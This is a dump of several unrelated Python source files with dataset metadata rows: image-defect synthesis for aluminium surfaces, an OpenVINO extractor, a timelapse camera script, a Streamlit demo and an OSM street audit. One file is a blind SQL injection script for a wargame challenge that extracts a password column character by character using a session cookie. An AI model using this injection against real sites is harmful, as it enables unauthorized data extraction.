self.defect_translation_image_list = []
self.defect_painting_image_list = []
# 缺陷存放
self.generate_defect_image_list = []
self.defect_affirm = {'class_affirm':False, 'scale_affirm':False, 'ratio_affirm':False,
'rotate_affirm':False, 'painting_affirm':False}
# 读图片,并转换为矩阵
def readimage(self, filename, channel=None):
image = np.array(Image.open(filename))
if channel==1:
image = self.image_transform_3_1(image)
elif channel==3:
image = self.image_transform_1_3(image)
return image
# 切除图片黑边
def cutback(self, image, right_left_threshold=80, up_and_down_threshold=80):
rows, cols = image.shape
cols_index = cols - 1
# 遍历判断列是否可以剪除
def cut_rl(w_index):
for i in range(rows):
if image[i][w_index] > right_left_threshold:
return False
return True
# 切除右边黑边
right_cut_x = cols_index
while right_cut_x > 0 and cut_rl(right_cut_x):
right_cut_x = right_cut_x - 1
if right_cut_x == 0:
print('图片全为黑,切除失败')
return False
image, _ = np.hsplit(image, (right_cut_x + 1,))
# 切除左边黑边
left_cut_x = 0
print(image.shape)
while cut_rl(left_cut_x):
left_cut_x = left_cut_x + 1
_, image = np.hsplit(image, (left_cut_x - 1,))
rows_, cols_ = image.shape
rows_index = rows_ - 1
# 遍历判断行是否可以剪除
def cut_ud(h_index):
for j in range(cols_):
if image[h_index][j] > up_and_down_threshold:
return False
return True
# 切除下边黑边
down_cut_y = rows_index
while cut_ud(down_cut_y):
down_cut_y = down_cut_y - 1
image, _ = np.split(image, (down_cut_y + 1,), axis=0)
# 切除上边黑边
up_cut_y = 0
while cut_ud(up_cut_y):
up_cut_y = up_cut_y + 1
_, image = np.split(image, (up_cut_y - 1,), axis=0)
print('左边切除', left_cut_x, '像素; ', '右边切除', cols_index - right_cut_x, '像素;',
'上边切除', up_cut_y, '像素; ', '下边切除', rows_index - down_cut_y, '像素;')
return image
# 单通道图像转为3通道图像
def image_transform_1_3(self, image):
assert len(image.shape) != 2 or len(image.shape) != 3, print('图像既不是3通道,也不是单通道')
if len(image.shape) == 2:
c = []
for i in range(3):
c.append(image)
image = np.asarray(c)
image = image.transpose([1, 2, 0])
elif len(image.shape)==3:
print('图像为3通道图像,不需要转换')
return image
# 3通道图像转为单通道图像
def image_transform_3_1(self, image):
assert len(image.shape) != 2 or len(image.shape) != 3, print('图像既不是3通道,也不是单通道')
if len(image.shape) == 3:
image_2 = np.zeros((image.shape[0], image.shape[1]), dtype=np.uint8)
# 灰度化方法2:根据亮度与RGB三个分量的对应关系:Y=0.3*R+0.59*G+0.11*B
h, w, color = image.shape
for i in range(h):
for j in range(w):
image_2[i][j] = np.uint8(0.3 * image[i][j][0] + 0.59 * image[i][j][1] + 0.11 * image[i][j][2])
image = image_2
assert len(image.shape) == 2, '3通道转为单通道图像失败'
elif len(image.shape) == 2:
print('图像为单通道图像,不需要转换')
return image
# 保存图片
def saveimage(self, image, saveimage_name=None, image_ext='bmp', saveimage_root=None):
if len(image.shape)==2:
image = self.image_transform_1_3(image)
if saveimage_name is None:
saveimage_name = 'image_{}'.format(strftime("%Y_%m_%d_%H_%M_%S")) + '.' + image_ext
else:
saveimage_name = saveimage_name + '.' + image_ext
if saveimage_root is None:
saveimage_root = 'C:\\Users\\jjj\\Desktop\\jjj\\zlrm\\data\\default_root'
print('未设置保存图片的路径,默认保存到_{}'.format(saveimage_root))
if not os.path.isdir(saveimage_root):
os.makedirs(saveimage_root)
root = os.path.join(saveimage_root, str(saveimage_name))
image = Image.fromarray(image)
image.save(root)
# 保存label
def savelabel(self, boxes, labelfile, savelabel_name=None, savelabel_root=None):
tree = ET.parse(labelfile)
root = tree.getroot()
if savelabel_name is None:
savelabel_name = 'box_{}'.format(strftime("%Y_%m_%d_%H_%M_%S")) + '.' + 'x,l'
else:
savelabel_name = savelabel_name + '.' + 'xml'
if savelabel_root is None:
savelabel_root = 'C:\\Users\\jjj\\Desktop\\jjj\\zlrm\\data\\default_root'
print('未设置保存boxes的路径,默认保存到_{}'.format(savelabel_root))
for i in range(len(boxes)):
# 一级
object = ET.Element('object')
# 二级
name = ET.Element('name')
name.text = boxes[i]['name']
pose = ET.Element('pose')
pose.text = 'Unspecified'
truncated = ET.Element('truncated')
truncated.text = '0'
difficult = ET.Element('difficult')
difficult.text = '1'
bndbox = ET.Element('bndbox')
# 三级
xmin = ET.Element('xmin')
xmin.text = str(boxes[i]['xmin'])
ymin = ET.Element('ymin')
ymin.text = str(boxes[i]['ymin'])
xmax = ET.Element('xmax')
xmax.text = str(boxes[i]['xmax'])
ymax = ET.Element('ymax')
ymax.text = str(boxes[i]['ymax'])
# 将节点添加到树
bndbox.append(xmin)
bndbox.append(ymin)
bndbox.append(xmax)
bndbox.append(ymax)
object.append(name)
object.append(pose)
object.append(truncated)
object.append(difficult)
object.append(bndbox)
root.append(object)
savelabel = os.path.join(savelabel_root, savelabel_name)
tree.write(savelabel)
# 生成一张纯白图片
def generate_white_image(self, shape=(600,600)):
image = np.zeros(shape, dtype=np.uint8)
h, w = image.shape
for i in range(h):
for j in range(w):
image[i][j] = np.uint8(255)
return image
# 清空残留列表
def clean_list(self):
if self.defect_affirm['class_affirm']:
self.defect_image_list = []
self.defect_affirm['class_affirm'] = False
if self.defect_affirm['scale_affirm']:
self.defect_scale_image_list = []
self.defect_affirm['scale_affirm'] = False
if self.defect_affirm['ratio_affirm']:
self.defect_ratio_image_list = []
self.defect_affirm['ratio_affirm'] = False
if self.defect_affirm['rotate_affirm']:
self.defect_rotate_image_list = []
self.defect_affirm['ratio_affirm'] = False
if self.defect_affirm['painting_affirm']:
self.defect_painting_image_list = []
self.defect_affirm['painting_affirm'] = False
# 为图片随机生成一些缺陷
def generate_defects(self, image, labelfile, freehand_sketching = False, save_name=None):
if save_name==None:
save_name = len(os.listdir(self.save_image_root))
save_name = save_name + 1
if len(self.generate_defect_image_list)==0:
for file in os.listdir(self.read_defect_root):
if freehand_sketching and file == 'freehand_sketching':
freehand_sketching_folder_root = os.path.join(self.read_defect_root, 'freehand_sketching')
for freehand_sketching_file in os.listdir(freehand_sketching_folder_root):
freehand_sketching_image_root = os.path.join(freehand_sketching_folder_root,
freehand_sketching_file)
freehand_sketching_image = self.readimage(freehand_sketching_image_root)
self.get_defect_freehand_sketching(freehand_sketching_image)
elif file == 'paint_smear':
paint_smear_folder_root = os.path.join(self.read_defect_root, 'paint_smear')
for paint_smear_file in os.listdir(paint_smear_folder_root):
paint_smear_image_root = os.path.join(paint_smear_folder_root, paint_smear_file)
paint_smear_image = self.readimage(paint_smear_image_root)
self.get_defect_paint_smear(paint_smear_image)
elif file == 'aluminium_skimmings':
aluminium_skimmings_folder_root = os.path.join(self.read_defect_root, 'aluminium_skimmings')
for aluminium_skimmings_file in os.listdir(aluminium_skimmings_folder_root):
aluminium_skimmings_image_root = os.path.join(aluminium_skimmings_folder_root,
aluminium_skimmings_file)
aluminium_skimmings_image = self.readimage(aluminium_skimmings_image_root)
self.get_defect_aluminium_skimmings(aluminium_skimmings_image)
# else:
# raise KeyError('未知的缺陷', file)
# self.random_defect()
defect_image_list = self.defect_image_list
if self.scale_random:
self.defect_scale(defect_image_list)
defect_image_list = self.defect_scale_image_list
if self.ratio_random:
self.defect_ratio(defect_image_list)
defect_image_list = self.defect_ratio_image_list
if self.rotate_random:
self.defect_rotate(defect_image_list)
defect_image_list = self.defect_rotate_image_list
if self.painting_random:
self.defect_painting(defect_image_list)
defect_image_list = self.defect_painting_image_list
self.generate_defect_image_list = defect_image_list
self.clean_list()
defect_image_list = self.generate_defect_image_list
print('生成的缺陷还有', len(defect_image_list))
if self.translation_random:
fetch = self.defect_translation(image, defect_image_list, labelfile)
if fetch == None:
print('输出未合成的label和image')
tree = ET.parse(labelfile)
save_xml_root = os.path.join(self.fail_label_root, save_name + '.xml')
tree.write(save_xml_root)
self.saveimage(image, saveimage_name=save_name, saveimage_root=self.fail_image_root)
else:
image = fetch[0]
boxes = fetch[1]
self.saveimage(image, saveimage_name=save_name, saveimage_root=self.save_image_root)
self.savelabel(boxes, labelfile, savelabel_name=save_name, savelabel_root=self.save_label_root)
def judge_vein_exist(self, file):
tree = ET.parse(file)
vein_exist = False
for obj in tree.findall('object'):
if obj.find('name').text == 'vein':
vein_exist = True
return vein_exist
# 为一批图像生成缺陷
def generate_defect_batch(self, batch_data_root=None):
for labelfile in os.listdir(self.read_label_root):
if labelfile.split('.')[-1] == 'xml':
print('为图片 ', labelfile.split('.')[0], ' 生成缺陷')
image_root = os.path.join(batch_data_root, labelfile.split('.')[0] + '.bmp')
image = self.readimage(image_root, channel=1)
# image = self.cutback(image)
h, w = image.shape
label_root = os.path.join(self.read_label_root, labelfile)
if h > 200 and w > 200 and h / w < 4.4 and w / h < 4.4:
if self.judge_vein_exist(label_root):
self.generate_defects(image, label_root, save_name=labelfile.split('.')[0])
print('已生成', len(os.listdir(self.save_image_root)), '个图片')
else:
tree = ET.parse(label_root)
save_xml_root = os.path.join(self.save_label_root, labelfile.split('.')[0])
tree.write(save_xml_root)
self.saveimage(image, saveimage_name=labelfile.split('.')[0], saveimage_root=self.save_image_root)
def preload_defect(self, preload_defect_root, freehand_sketching = False):
for file in os.listdir(preload_defect_root):
if freehand_sketching and file == 'freehand_sketching':
freehand_sketching_folder_root = os.path.join(preload_defect_root, 'freehand_sketching')
for freehand_sketching_file in os.listdir(freehand_sketching_folder_root):
freehand_sketching_image_root = os.path.join(freehand_sketching_folder_root,
freehand_sketching_file)
freehand_sketching_image = self.readimage(freehand_sketching_image_root)
image = self.get_defect_freehand_sketching(freehand_sketching_image)
if image is not None:
self.saveimage(image, saveimage_name=freehand_sketching_file.split('.')[0],
saveimage_root=os.path.join(self.read_defect_root, 'freehand_sketching'))
elif file == 'paint_smear1':
paint_smear_folder_root = os.path.join(preload_defect_root, 'paint_smear')
for paint_smear_file in os.listdir(paint_smear_folder_root):
paint_smear_image_root = os.path.join(paint_smear_folder_root, paint_smear_file)
paint_smear_image = self.readimage(paint_smear_image_root)
image = self.get_defect_paint_smear(paint_smear_image, preload=True)
if image is not None:
self.saveimage(image, saveimage_name=paint_smear_file.split('.')[0],
saveimage_root=os.path.join(self.read_defect_root, 'paint_smear'))
elif file == 'aluminium_skimmings':
aluminium_skimmings_folder_root = os.path.join(preload_defect_root, 'aluminium_skimmings')
for aluminium_skimmings_file in os.listdir(aluminium_skimmings_folder_root):
aluminium_skimmings_image_root = os.path.join(aluminium_skimmings_folder_root,
aluminium_skimmings_file)
aluminium_skimmings_image = self.readimage(aluminium_skimmings_image_root)
image = self.get_defect_aluminium_skimmings(aluminium_skimmings_image, preload=True)
if image is not None:
self.saveimage(image, saveimage_name=aluminium_skimmings_file.split('.')[0],
saveimage_root=os.path.join(self.read_defect_root, 'aluminium_skimmings'))
# 获得手绘缺陷
def get_defect_freehand_sketching(self, image):
if len(image.shape)==3:
image = self.image_transform_3_1(image)
assert len(image.shape)==2, '图片不能转为单通道'
h, w = image.shape
for i in range(h):
for j in range(w):
if image[i][j]>200:
image[i][j] = 0
else:
image[i][j] = 255
image = self.cutback(image)
if image is not False:
print('读取缺陷完成')
self.defect_image_list.append({'name': 'freehand_sketching', 'image': image})
# print(len(self.defect_image))
self.defect_affirm['class_affirm'] = True
return image
# 获得油污缺陷
def get_defect_paint_smear(self, image, preload=False):
if len(image.shape) == 3:
image = self.image_transform_3_1(image)
assert len(image.shape) == 2, '图片不能转为单通道'
h, w = image.shape
for i in range(h):
for j in range(w):
if image[i][j] > 75:
image[i][j] = 0
image = self.cutback(image, right_left_threshold=1, up_and_down_threshold=1)
if image is not False:
h, w = image.shape
if preload:
for i in range(h):
for j in range(w):
if image[i][j] == 0:
image[i][j] = 255
print('读取缺陷完成')
self.defect_image_list.append({'name': 'paint_smear', 'image': image})
# print(len(self.defect_image))
self.defect_affirm['class_affirm'] = True
return image
# 获得铝屑缺陷
def get_defect_aluminium_skimmings(self, image, preload=False):
if len(image.shape) == 3:
image = self.image_transform_3_1(image)
assert len(image.shape) == 2, '图片不能转为单通道'
h, w = image.shape
for i in range(h):
for j in range(w):
if image[i][j] > 80:
image[i][j] = 0
image = self.cutback(image, right_left_threshold=1, up_and_down_threshold=1)
if image is not False:
h, w = image.shape
if preload:
for i in range(h):
for j in range(w):
if image[i][j] == 0:
image[i][j] = 255
print('读取缺陷完成')
self.defect_image_list.append({'name': 'aluminium_skimmings', 'image': image})
# print(len(self.defect_image))
self.defect_affirm['class_affirm'] = True
return image
# 随机生成缺陷
def random_defect(self, p_threshold=0.5):
# 从一个点开始以一定的概率分布随机往外生长
h = 0
w = 0
while h < 100 and w < 100:
image = np.zeros((401, 401), dtype=np.uint8)
h, w = image.shape
image[0][0] = 255
for i in range(h):
for j in range(i + 1):
if j - 1 >= 0:
if image[j - 1][i - j] == 255:
if np.random.rand() < p_threshold:
image[j][i - j] = 255
if i - j - 1 >= 0:
if image[j][i - j - 1] == 255:
if np.random.rand() < p_threshold:
image[j][i - j] = 255
if j - 1 >= 0 and i - j - 1 >= 0:
if image[j - 1][i - j - 1] == 255:
if np.random.rand() < p_threshold:
image[j][i - j] = 255
image = self.cutback(image)
h, w = image.shape
# h = 0
# w = 0
# while h < 100 and w < 100:
# image_ = np.zeros((401, 401), dtype=np.uint8)
# h, w = image_.shape
# image_[400][400] = 255
# for i in range(h):
# for j in range(i + 1):
# if j - 1 >= 0:
# if image_[400 - j + 1][400 - i + j] == 255:
# if np.random.rand() < p_threshold:
# image_[400 - j][400 - i + j] = 255
# if i - j - 1 >= 0:
# if image_[400 - j][400 - i + j + 1] == 255:
# if np.random.rand() < p_threshold:
# image_[400 - j][400 - i + j] = 255
# if j - 1 >= 0 and i - j - 1 >= 0:
# if image_[400 - j + 1][400 - i + j + 1] == 255:
# if np.random.rand() < p_threshold:
# image_[400 - j][400 - i + j] = 255
# image_ = self.cutback(image_)
# h, w = image_.shape
self.defect_image_list.append(image)
# print(len(self.defect_image))
self.defect_affirm['class_affirm'] = True
self.saveimage(image, saveimage_name='jjj')
# 随机的上色方案
def painting_random_fetch(self, painting_schem=None, ):
random = np.random.randint(1,11)
if painting_schem == 1:
painting = np.random.randint(1,50)
if painting_schem == 2:
painting = np.random.randint(70, 120)
if painting_schem == 3:
painting = np.random.randint(150,255)
return painting
# 给曲线内部上色
def defect_painting(self, defect_image_list):
defect_data = defect_image_list
for n in range(len(defect_data)):
image = defect_data[n]['image']
h, w = image.shape
for p in range(np.random.randint(3,5)):
# painting_schem为随机到的上色方案,共有3套方案
painting_schem = np.random.randint(1, 5)
painting = 1
if painting_schem < 4:
painting = self.painting_random_fetch(painting_schem=painting_schem)
for i in range(h):
left_ = 0
left_2 = 0
right_ = 0
switch = 0
j = 0
while j < w:
left_2 = j
while j < w and image[i][j] == 0:
j = j + 1
left_ = j
while j < w and image[i][j] != 0:
j = j + 1
right_ = j
if left_ != right_:
if switch == 0:
switch = 1
switch = (-1)*switch
if switch == 1:
left_ = left_2
for k in range(left_, right_):
if painting_schem == 4:
image[i][k] = np.random.randint(1,255)
image[i][k] = painting
self.defect_painting_image_list.append({'name':defect_data[n]['name'], 'image':image})
self.defect_affirm['painting_affirm'] = True
# 对缺陷进行旋转
def defect_rotate(self, defect_image_list):
defect_data = defect_image_list
for n in range(len(defect_data)):
image = defect_data[n]['image']
for s in range(np.random.randint(3, 5)):
rotation_angle = np.random.randint(0, 360)
image = Image.fromarray(image.astype(np.uint8))
image = image.rotate(rotation_angle)
image = np.array(image)
self.defect_rotate_image_list.append({'name':defect_data[n]['name'], 'image':image})
self.defect_affirm['rotate_affirm'] = True
# 从xml文件里得到对应铝锭表面图片的缺陷框,分为缺陷和纹理
def get_defectbox_from_xml(self, xlm_filename):
tree = ET.parse(xlm_filename)
obj_box = []
vein_box = []
for obj in tree.findall('object'):
if obj.find('name').text == 'vein':
bbox = obj.find('bndbox')
box = [int(bbox.find('xmin').text),
int(bbox.find('ymin').text),
int(bbox.find('xmax').text),
int(bbox.find('ymax').text)]
vein_box.append(box)
else:
bbox = obj.find('bndbox')
box = [int(bbox.find('xmin').text),
int(bbox.find('ymin').text),
int(bbox.find('xmax').text),
int(bbox.find('ymax').text)]
obj_box.append(box)
return obj_box, vein_box
# 选择放缺陷的位置,并返回最小h, w坐标
def select_defect_loacte(self, obj_box, vein_box, defect_size):
# 寻找位置的次数
find_num = 0
vein = vein_box[np.random.randint(0, len(vein_box))]
locate = []
locate.append(np.random.randint(vein[1] + 1, vein[3] - defect_size[0]))#h
locate.append(np.random.randint(vein[0] + 1, vein[2] - defect_size[1]))#w
while self.judge_inter(obj_box, locate, defect_size) and find_num<300:
locate[0] = np.random.randint(vein[1] + 1, vein[3] - defect_size[0])
locate[1] = np.random.randint(vein[0] + 1, vein[2] - defect_size[1])
find_num = find_num + 1
if find_num < 300:
return locate
else:
print('获取位置失败')
return None
# 判断所选的框与obj_box是否相交
def judge_inter(self, obj_box, locate, defect_size):
defect_box = [locate[0], locate[1], locate[0] + defect_size[1], locate[1] + defect_size[0]]
defect_box = np.array(defect_box)
obj_box = np.array(obj_box)
if len(obj_box) == 0:
inters = 0
elif len(obj_box) == 1:
ixmin = np.maximum(obj_box[0, 0], defect_box[0])
iymin = np.maximum(obj_box[0, 1], defect_box[1])
ixmax = np.minimum(obj_box[0, 2], defect_box[2])
iymax = np.minimum(obj_box[0, 3], defect_box[3])
iw = np.maximum(ixmax - ixmin + 1., 0.)
ih = np.maximum(iymax - iymin + 1., 0.)
inters = iw * ih
else:
ixmin = np.maximum(obj_box[:, 0], defect_box[0])
iymin = np.maximum(obj_box[:, 1], defect_box[1])
ixmax = np.minimum(obj_box[:, 2], defect_box[2])
iymax = np.minimum(obj_box[:, 3], defect_box[3])
iw = np.maximum(ixmax - ixmin + 1., 0.)
ih = np.maximum(iymax - iymin + 1., 0.)
inters = iw * ih
print('inters', inters, np.sum(np.array(inters) <= 0), (np.array(inters)).size)
if np.sum(np.array(inters) <= 0) == (np.array(inters)).size:
return False
else:
return True
# 对缺陷进行平移
def defect_translation(self, image, defect_image_list, filename):
# 得到缺陷的位置框和纹理的位置框
obj_box, vein_box = self.get_defectbox_from_xml(filename)
h, w = image.shape
# print(len(defect_image))
assert len(defect_image_list)>0, '未生成缺陷,不能与样本合成有缺陷的样本'
boxes = []
high = min(len(defect_image_list), 4)
low = 1
if len(defect_image_list)>=2:
low = 2
defect_image_fetch = np.random.randint(low=0, high=len(defect_image_list), size=np.random.randint(low, high+1))
defect_image_fetch = list(defect_image_fetch)
defect_image_fetch = list(set(defect_image_fetch))
defect_image_fetch.sort(reverse=True)
for n in defect_image_fetch:
defect_image_ = defect_image_list[n]['image']
defect_size = defect_image_.shape
# print(defect_image_.shape)
locate = self.select_defect_loacte(obj_box, vein_box, defect_size)#h,w
if locate == None :
return None
else:
for i in range(defect_size[0]):
for j in range(defect_size[1]):
if defect_image_[i][j] != 0:
image[i + locate[0]][j + locate[1]] = defect_image_[i][j]
box = {'name':defect_image_list[n]['name'], 'xmin': locate[1] - 1, 'ymin': locate[0] - 1,
'xmax': locate[1] + defect_size[1] + 1, 'ymax': locate[0] + defect_size[0] + 1}
print(locate)
print('defectsize',defect_size)
print('box',box)
boxes.append(box)
defect_box = [locate[1] - 1, locate[0] - 1, locate[1] + defect_size[1] + 1,
locate[0] + defect_size[1] + 1]
obj_box.append(defect_box)
for i in range(len(defect_image_fetch)):
defect_image_list.pop(defect_image_fetch[i])
return image, boxes
# 按一定分布得到一随机数,以此作为缺陷图片的大小
def scale_random_fetch(self):
p = np.random.randint(0,10)
if p < 2:
size = np.random.randint(8,20)
elif p < 4:
size = np.random.randint(20,40)
elif p < 6:
size = np.random.randint(40,60)
elif p < 8:
size = np.random.randint(60,80)
else:
size = np.random.randint(80,100)
return size
# 对缺陷进行大小变换
def defect_scale(self, defect_image_list):
defect_data = defect_image_list
for n in range(len(defect_data)):
image = defect_data[n]['image']
for s in range(np.random.randint(3, 5)):
size = self.scale_random_fetch()
image = Image.fromarray(image.astype(np.uint8))
image = image.resize((size, size), Image.ANTIALIAS)
image = np.array(image)
self.defect_scale_image_list.append({'name':defect_data[n]['name'], 'image':image})
self.defect_affirm['scale_affirm'] = True
# 对缺陷进行高宽的比例变换
def defect_ratio(self, defect_image_list):
defect_data = defect_image_list
for n in range(len(defect_data)):
image = defect_data[n]['image']
h, w = image.shape
for s in range(np.random.randint(3, 5)):
h_, w_ = np.random.randint(1,11,size=2)
size_h = np.int(np.sqrt((h * w) / (h_ * w_)) * h_) + 1
size_w = np.int(np.sqrt((h * w) / (h_ * w_)) * w_) + 1
image = Image.fromarray(image.astype(np.uint8))
image = image.resize((size_h, size_w), Image.ANTIALIAS)
image = np.array(image)
self.defect_ratio_image_list.append({'name':defect_data[n]['name'], 'image':image})
self.defect_affirm['ratio_affirm'] = True
if __name__ == '__main__':
# k = []
datadir = 'H:\\defect\\paint_smear'
ga = Generate_Defect()
for imagefile in os.listdir(datadir):
imageroot = os.path.join(datadir, imagefile)
image = ga.readimage(imageroot, channel=3)
# print(image)
image = ga.get_defect_paint_smear(image)
name = imagefile + 'k'
ga.saveimage(image,saveimage_name=name, saveimage_root=datadir)
| [
"[email protected]"
] | |
f340ae17ed7dee7981490e76342aa9850c34df1d | 5b832a08d8967d8d82f44f1d494b9d3474d68a4c | /chall55.py | fca83463b9c140f7fbe01fef90ed179f4a155d6c | [] | no_license | webhacking/webhacking.kr | 7cce9425316bb462f0d87d71b14302f3a1e8b0e3 | 3e540003cbaf33e5620bee532f71a3722ecd7cfa | refs/heads/master | 2021-01-01T04:28:59.077842 | 2015-06-13T08:44:08 | 2015-06-13T08:44:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 767 | py | import requests
url='http://webhacking.kr/challenge/web/web-31/rank.php?score=1%09or%091%09and%09right(left(pAsSw0RdzzzZ,'
param='),1)='
cookies={'PHPSESSID':'v8vr9tl8nj5ic89us02rjcgua2'}
#print requests.get('http://webhacking.kr/challenge/web/web-31/rank.php?score=1%09or%091%09and%09right(left(pAsSw0RdzzzZ,1),1)=0x63',cookies=cookies).text #true localhost in
#raw_input()
#resp = requests.get(url, cookies=cookies)
key=''
for count in xrange(1,21):
for i in xrange(0x20,0x80): # ascii
url1 = url + str(count) + param + str(hex(i))
print url1
resp = requests.get(url1, cookies=cookies)
if 'localhost' in resp.text:
key=key+chr(i)
print "find it! " + key
break
print key
#print resp.text
| [
"[email protected]"
] | |
10a98cde3457743f33c29b120825b0bd0c19af31 | 2ae0b8d95d439ccfd55ea7933ad4a2994ad0f6c5 | /tools/mo/openvino/tools/mo/front/onnx/gathernd_ext.py | b638ad0cc4d29c517ebaa0ba1bf96d72f56e7752 | [
"Apache-2.0"
] | permissive | openvinotoolkit/openvino | 38ea745a247887a4e14580dbc9fc68005e2149f9 | e4bed7a31c9f00d8afbfcabee3f64f55496ae56a | refs/heads/master | 2023-08-18T03:47:44.572979 | 2023-08-17T21:24:59 | 2023-08-17T21:24:59 | 153,097,643 | 3,953 | 1,492 | Apache-2.0 | 2023-09-14T21:42:24 | 2018-10-15T10:54:40 | C++ | UTF-8 | Python | false | false | 575 | py | # Copyright (C) 2018-2023 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
from openvino.tools.mo.ops.gathernd import GatherND
from openvino.tools.mo.front.extractor import FrontExtractorOp
from openvino.tools.mo.front.onnx.extractors.utils import onnx_attr
class GatherNDFrontExtractor(FrontExtractorOp):
op = 'GatherND'
enabled = True
@classmethod
def extract(cls, node):
attrs = {
'batch_dims': onnx_attr(node, 'batch_dims', 'i', default=0)
}
GatherND.update_node_stat(node, attrs)
return cls.enabled
| [
"[email protected]"
] | |
113d8826277c464d78f5df2901a3616ed0be649c | 307089d509d2b72ac036b7fcc5bd60f5759cca6f | /opencv/timelapse-usb.py | 5796e4b04d7171718fe2ddbaca9b0b4efb04bce1 | [] | no_license | bluemooninc/campi | 45a7bf480d6c507a20f132c64ed8315776ccacbb | 7614e2847e12442c1900281662b7bac587a9ee46 | refs/heads/master | 2020-04-06T13:12:41.184245 | 2016-09-06T14:40:03 | 2016-09-06T14:40:03 | 52,285,836 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,127 | py | import cv2
import numpy as np
import time
import datetime
import logging
import scp
import ConfigParser
import os.path
import os
import socket
import glob
import re
import lcd
##
## config
##
inifile = ConfigParser.SafeConfigParser()
inifile.read("/home/pi/camlaps.ini")
serialno = inifile.get("user","serialno")
frameWidth = inifile.getint("camera","frameWidth")
frameHeight = inifile.getint("camera","frameHeight")
delay = inifile.getint("camera","delay")
shottime = inifile.getint("camera","shottime")
## get ip address
gw = os.popen("ip -4 route show default").read().split()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((gw[2], 0))
ipaddr = s.getsockname()[0]
LOG_FILENAME = '/var/log/timelapse.log'
logging.basicConfig(filename=LOG_FILENAME,level=logging.DEBUG)
logging.debug(cv2.__version__)
logging.debug('timelapse start...')
# initialize the camera and grab a reference to the raw camera capture
print frameWidth
print frameHeight
location = (0,30)
fontscale = 2.0
fontface = cv2.FONT_HERSHEY_PLAIN
color = (255,190,0)
dt = datetime.datetime.today()
seekfile = '/home/pi/picture/img%02d-*.jpg' % dt.hour
newestCount = 0
##
## capture start
##
# capture frames from the camera
count = 0
cap = cv2.VideoCapture(0)
cap.set(3,frameWidth)
cap.set(4,frameHeight)
if not cap:
print "Could not open camera"
sys.exit()
time.sleep(1)
while(cap.isOpened()):
# grab the raw NumPy array representing the image, then initialize the timestamp
# and occupied/unoccupied text
ret, img = cap.read()
print count
now = datetime.datetime.now()
msg = now.strftime("%Y/%m/%d %H:%M:%S")
cv2.putText(img,msg,location,fontface,fontscale,color,4)
fname = "img%02d-%04d.jpg" % (dt.hour,count,)
fpath = "/home/pi/picture/" + fname
#logging.debug("debug:"+fname)
if os.path.exists(fpath):
os.remove(fpath)
print fname + msg
cv2.imwrite(fpath, img)
lcd.printLcd("Shot:%04d/%04d, IP:%s" % (count,shottime,ipaddr))
if count < newestCount+shottime:
time.sleep(delay)
count+=1
else:
break
##
## finish
##
lcd.printIP()
| [
"root@raspberrypi.(none)"
] | root@raspberrypi.(none) |
51ebb937c14abbd238fc78b2b7209d12b00a2742 | 3abb791b043178ee56c46288eed930a435194cff | /streamlit_test_main.py | a6a070812e8d933b73ad986d0323596b88524240 | [] | no_license | masatoraogata369/streamlit_test | b8a0d1577b9df9c8d38c7b8377ea9e0d0724d0b6 | 5e5e9e46dd595a48755bd5dceaf30435dac96d36 | refs/heads/master | 2023-04-15T01:32:14.888087 | 2021-04-28T23:33:44 | 2021-04-28T23:33:44 | 362,457,137 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,011 | py | """
streamlitを試す、爆速でデータ可視化、分析アプリを作成できる。
**メモ
conda環境なのでconda installでインストールする
マークダウン言語の書式に対応、マークダウン:マークアップの簡単なやつ
#の数で構造を示し、バックコーテーションで囲いがつく
インタラクティブなウィジェットも作れるよー
"""
import streamlit as st
import numpy as np
import pandas as pd
#import time
from PIL import Image
st.title("Streamlit 入門")
st.write("display DataFrame")
#カラムに関する処理
left_columns, right_columns = st.beta_columns(2)
button1 = left_columns.button("右カラムに文字を表示")
button2 = left_columns.button("表示をリセット")
if button1:
right_columns.write("ここは右カラムです")
if button2:
pass
df = pd.DataFrame(
np.random.rand(100,2)/[50,50] + [34.7338219,135.5014056],
columns=['lat','lon']
)
img = Image.open("IMG_7282.JPG")
#動的な表を表示させる場合はdataframeを利用
if st.checkbox("show dataframe"):
st.dataframe(df,width = 400,height = 200)
#折れ線グラフ
#st.line_chart(df)
#エリアチャート
#st.area_chart(df)
#棒グラフ
#st.bar_chart(df)
#マップ表示
if st.checkbox("show maps"):
"""
## 新大阪付近
### ランダムに緯度経度をプロット
"""
st.map(df)
if st.checkbox("show image"):
st.write("Display images, good views")
st.image(img, caption='good view',use_column_width=True)
st.sidebar.write('interactive widgets')
text = st.sidebar.text_input(
"趣味は?"
)
option = st.sidebar.selectbox(
"好きな数字を教えてください",
list(range(1,10))
)
"あなたの好きな数字は",option,"ですよん"
"あなたの趣味は",text,"ですよん"
#expander
expander = st.beta_expander("問い合わせ先")
expander.write("please mail me xxx")
| [
"[email protected]"
] | |
7d914fe69c7e5bff93630dbda1b39b6086d3bc58 | 4c7d74c860c763e8f53eed5ad9bacced58ca253e | /p4/audit.py | c6a63d59a4a31ba6ecc4d27882d68b69468a5685 | [] | no_license | djlee11/udacity-dand | e2261a37090da64e3254de23f7ad0dd041be7536 | 3faa4fb64d3223bdd8650e176fcd317249ec9799 | refs/heads/master | 2021-10-09T21:46:13.855480 | 2019-01-03T19:06:40 | 2019-01-03T19:06:40 | 106,338,887 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,612 | py | import xml.etree.cElementTree as ET
from pprint import pformat
import pprint
import re
from collections import defaultdict
osmfile = './input/sample.osm'
street_type_re = re.compile(r'\b\S+\.?$', re.IGNORECASE)
num_type_re = re.compile(r'\b[0-9][0-9][0-9]$|\b[0-9][0-9]$')
lowercase_re = re.compile(r'\b[a-z]+\b')
capitalize_re = re.compile(r'\b[A-Z]+\b')
postal_re = re.compile(r'\D+')
county_re = re.compile(r'[\:]|[\;]')
expected = ["Street", "Avenue", "Boulevard", "Drive", "Court", "Place", "Lane", "Road",
"Trail", "Parkway", "Ridge", "Way", "Pass", "Creek", "Chase", "Crossing",
"Terrace", "Point", "Path", "Loop", "Run", "Cove", 'Bend', 'Circle', 'Trace', 'Walk',
"Southeast", "Southwest", "Square", "Northeast", "Northwest", "View", "Landing", "North","East",
"South", "West"]
def audit_street_type(street_types, street_name):
m = street_type_re.search(street_name)
if m:
street_type = m.group()
if street_type not in expected:
street_types[street_type].add(street_name)
def audit(osmfile):
osm_file = open(osmfile, 'r')
